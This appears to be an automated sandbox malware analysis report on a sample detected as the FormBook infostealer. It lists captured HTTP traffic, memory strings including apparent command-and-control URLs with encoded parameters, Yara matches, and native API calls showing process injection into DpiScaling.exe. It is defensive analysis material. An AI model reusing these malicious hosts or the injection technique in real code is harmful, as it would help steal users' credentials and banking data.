72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 548Content-Type: text/htmlDate: Sat, 11 Jan 2025 04:44:25 GMTServer: nginxX-Cache: BYPASSConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 548Content-Type: text/htmlDate: Sat, 11 Jan 2025 04:44:28 GMTServer: nginxX-Cache: BYPASSConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 548Content-Type: text/htmlDate: Sat, 11 Jan 2025 04:44:30 GMTServer: nginxX-Cache: BYPASSConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->

Source: 4p5XLVXJnq.exe, 00000000.00000002.2222596545.0000000003361000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: yAMzZKaZoBLE.exe, 0000000B.00000002.3913101249.0000000004BEB000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.nocoma.berlin
Source: yAMzZKaZoBLE.exe, 0000000B.00000002.3913101249.0000000004BEB000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.nocoma.berlin/orhf/
Source: DpiScaling.exe, 00000009.00000002.3914457609.0000000007928000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: DpiScaling.exe, 00000009.00000002.3914457609.0000000007928000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: DpiScaling.exe, 00000009.00000002.3914457609.0000000007928000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: DpiScaling.exe, 00000009.00000002.3914457609.0000000007928000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: DpiScaling.exe, 00000009.00000002.3914457609.0000000007928000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: DpiScaling.exe, 00000009.00000002.3914457609.0000000007928000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: DpiScaling.exe, 00000009.00000002.3914457609.0000000007928000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: DpiScaling.exe, 00000009.00000002.3912662659.00000000051F4000.00000004.10000000.00040000.00000000.sdmp, yAMzZKaZoBLE.exe, 0000000B.00000002.3911491509.0000000002B44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2815333258.000000001EF94000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://joker.com/?pk_campaign=Parking&pk_kwd=text
Source: DpiScaling.exe, 00000009.00000002.3910070934.00000000008D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: DpiScaling.exe, 00000009.00000002.3910070934.00000000008D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: DpiScaling.exe, 00000009.00000002.3910070934.00000000008D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: DpiScaling.exe, 00000009.00000002.3910070934.00000000008D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: DpiScaling.exe, 00000009.00000002.3910070934.00000000008D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: DpiScaling.exe, 00000009.00000002.3910070934.00000000008D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: DpiScaling.exe, 00000009.00000003.2705830059.000000000785D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: DpiScaling.exe, 00000009.00000002.3914457609.0000000007928000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: DpiScaling.exe, 00000009.00000002.3912662659.0000000005518000.00000004.10000000.00040000.00000000.sdmp, yAMzZKaZoBLE.exe, 0000000B.00000002.3911491509.0000000002E68000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: DpiScaling.exe, 00000009.00000002.3912662659.00000000059CE000.00000004.10000000.00040000.00000000.sdmp, yAMzZKaZoBLE.exe, 0000000B.00000002.3911491509.000000000331E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.myfastuploader.sbs/wzdf/?Kd=jBNibQcdmOFg/RIqG8jlAjBoyJ6r3PRdeIkgLqEqUdIwomL9MZX3SvRzFch/
Source: yAMzZKaZoBLE.exe, 0000000B.00000002.3911491509.0000000002CD6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.newbh.pro/67jc/?2XPD1Xa=kDkUHRN5t7dj/L6pasl433PChqjcVEMZ28RJcX0ruebcxps2UknCE2lQjYLeIVRP
Source: yAMzZKaZoBLE.exe, 0000000B.00000002.3911491509.00000000037D4000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.strato.de

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 4.2.4p5XLVXJnq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.4p5XLVXJnq.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.3911403503.0000000004400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2497694458.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3913101249.0000000004B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3909863073.0000000000610000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2498497555.0000000001170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3911348122.00000000043B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3911212412.0000000006760000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2504665836.0000000005390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0042CF83 NtClose,	4_2_0042CF83
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012F2B60 NtClose,LdrInitializeThunk,	4_2_012F2B60
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012F2DF0 NtQuerySystemInformation,LdrInitializeThunk,	4_2_012F2DF0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012F2C70 NtFreeVirtualMemory,LdrInitializeThunk,	4_2_012F2C70
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012F35C0 NtCreateMutant,LdrInitializeThunk,	4_2_012F35C0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012F4340 NtSetContextThread,	4_2_012F4340
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012F4650 NtSuspendThread,	4_2_012F4650
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012F2BA0 NtEnumerateValueKey,	4_2_012F2BA0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012F2B80 NtQueryInformationFile,	4_2_012F2B80
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012F2BE0 NtQueryValueKey,	4_2_012F2BE0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012F2BF0 NtAllocateVirtualMemory,	4_2_012F2BF0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012F2AB0 NtWaitForSingleObject,	4_2_012F2AB0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012F2AF0 NtWriteFile,	4_2_012F2AF0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012F2AD0 NtReadFile,	4_2_012F2AD0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012F2D30 NtUnmapViewOfSection,	4_2_012F2D30
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012F2D00 NtSetInformationFile,	4_2_012F2D00
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012F2D10 NtMapViewOfSection,	4_2_012F2D10
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012F2DB0 NtEnumerateKey,	4_2_012F2DB0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012F2DD0 NtDelayExecution,	4_2_012F2DD0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012F2C00 NtQueryInformationProcess,	4_2_012F2C00
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012F2C60 NtCreateKey,	4_2_012F2C60
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012F2CA0 NtQueryInformationToken,	4_2_012F2CA0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012F2CF0 NtOpenProcess,	4_2_012F2CF0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012F2CC0 NtQueryVirtualMemory,	4_2_012F2CC0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012F2F30 NtCreateSection,	4_2_012F2F30
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012F2F60 NtCreateProcessEx,	4_2_012F2F60
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012F2FA0 NtQuerySection,	4_2_012F2FA0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012F2FB0 NtResumeThread,	4_2_012F2FB0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012F2F90 NtProtectVirtualMemory,	4_2_012F2F90
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012F2FE0 NtCreateFile,	4_2_012F2FE0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012F2E30 NtWriteVirtualMemory,	4_2_012F2E30
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012F2EA0 NtAdjustPrivilegesToken,	4_2_012F2EA0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012F2E80 NtReadVirtualMemory,	4_2_012F2E80
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012F2EE0 NtQueueApcThread,	4_2_012F2EE0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012F3010 NtOpenDirectoryObject,	4_2_012F3010
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012F3090 NtSetValueKey,	4_2_012F3090
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012F39B0 NtGetContextThread,	4_2_012F39B0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012F3D10 NtOpenProcessToken,	4_2_012F3D10
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_012F3D70 NtOpenThread,	4_2_012F3D70
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04854650 NtSuspendThread,LdrInitializeThunk,	9_2_04854650
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04854340 NtSetContextThread,LdrInitializeThunk,	9_2_04854340
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04852CA0 NtQueryInformationToken,LdrInitializeThunk,	9_2_04852CA0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04852C60 NtCreateKey,LdrInitializeThunk,	9_2_04852C60
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04852C70 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_04852C70
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04852DD0 NtDelayExecution,LdrInitializeThunk,	9_2_04852DD0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04852DF0 NtQuerySystemInformation,LdrInitializeThunk,	9_2_04852DF0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04852D10 NtMapViewOfSection,LdrInitializeThunk,	9_2_04852D10
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04852D30 NtUnmapViewOfSection,LdrInitializeThunk,	9_2_04852D30
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04852E80 NtReadVirtualMemory,LdrInitializeThunk,	9_2_04852E80
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04852EE0 NtQueueApcThread,LdrInitializeThunk,	9_2_04852EE0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04852FB0 NtResumeThread,LdrInitializeThunk,	9_2_04852FB0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04852FE0 NtCreateFile,LdrInitializeThunk,	9_2_04852FE0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04852F30 NtCreateSection,LdrInitializeThunk,	9_2_04852F30
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04852AD0 NtReadFile,LdrInitializeThunk,	9_2_04852AD0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04852AF0 NtWriteFile,LdrInitializeThunk,	9_2_04852AF0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04852BA0 NtEnumerateValueKey,LdrInitializeThunk,	9_2_04852BA0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04852BE0 NtQueryValueKey,LdrInitializeThunk,	9_2_04852BE0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04852BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	9_2_04852BF0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04852B60 NtClose,LdrInitializeThunk,	9_2_04852B60
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048535C0 NtCreateMutant,LdrInitializeThunk,	9_2_048535C0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_048539B0 NtGetContextThread,LdrInitializeThunk,	9_2_048539B0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04852CC0 NtQueryVirtualMemory,	9_2_04852CC0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04852CF0 NtOpenProcess,	9_2_04852CF0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04852C00 NtQueryInformationProcess,	9_2_04852C00
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04852DB0 NtEnumerateKey,	9_2_04852DB0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04852D00 NtSetInformationFile,	9_2_04852D00
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04852EA0 NtAdjustPrivilegesToken,	9_2_04852EA0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04852E30 NtWriteVirtualMemory,	9_2_04852E30
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04852F90 NtProtectVirtualMemory,	9_2_04852F90
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04852FA0 NtQuerySection,	9_2_04852FA0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04852F60 NtCreateProcessEx,	9_2_04852F60
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04852AB0 NtWaitForSingleObject,	9_2_04852AB0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04852B80 NtQueryInformationFile,	9_2_04852B80
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04853090 NtSetValueKey,	9_2_04853090
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04853010 NtOpenDirectoryObject,	9_2_04853010
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04853D10 NtOpenProcessToken,	9_2_04853D10
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_04853D70 NtOpenThread,	9_2_04853D70
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_00639970 NtCreateFile,	9_2_00639970
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_00639AE0 NtReadFile,	9_2_00639AE0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_00639BD0 NtDeleteFile,	9_2_00639BD0
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_00639C70 NtClose,	9_2_00639C70
Source: C:\Windows\SysWOW64\DpiScaling.exe	Code function: 9_2_00639DD0 NtAllocateVirtualMemory,	9_2_00639DD0

Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 0_2_03193E1C	0_2_03193E1C
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 0_2_03196F92	0_2_03196F92
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 0_2_0319DFC4	0_2_0319DFC4
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 0_2_0783C8C1	0_2_0783C8C1
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_00418F23	4_2_00418F23
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_00403095	4_2_00403095
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_004030A0	4_2_004030A0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0040E959	4_2_0040E959
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_00410963	4_2_00410963
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0040E963	4_2_0040E963
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0041710F	4_2_0041710F
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_00417113	4_2_00417113
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_004022D6	4_2_004022D6
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_004022E0	4_2_004022E0
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0040EAA8	4_2_0040EAA8
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0040EAB3	4_2_0040EAB3
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0040EB7B	4_2_0040EB7B
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_00402C50	4_2_00402C50
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_0040248D	4_2_0040248D
Source: C:\Users\user\Desktop\4p5XLVXJnq.exe	Code function: 4_2_00402490	4_2_00402490
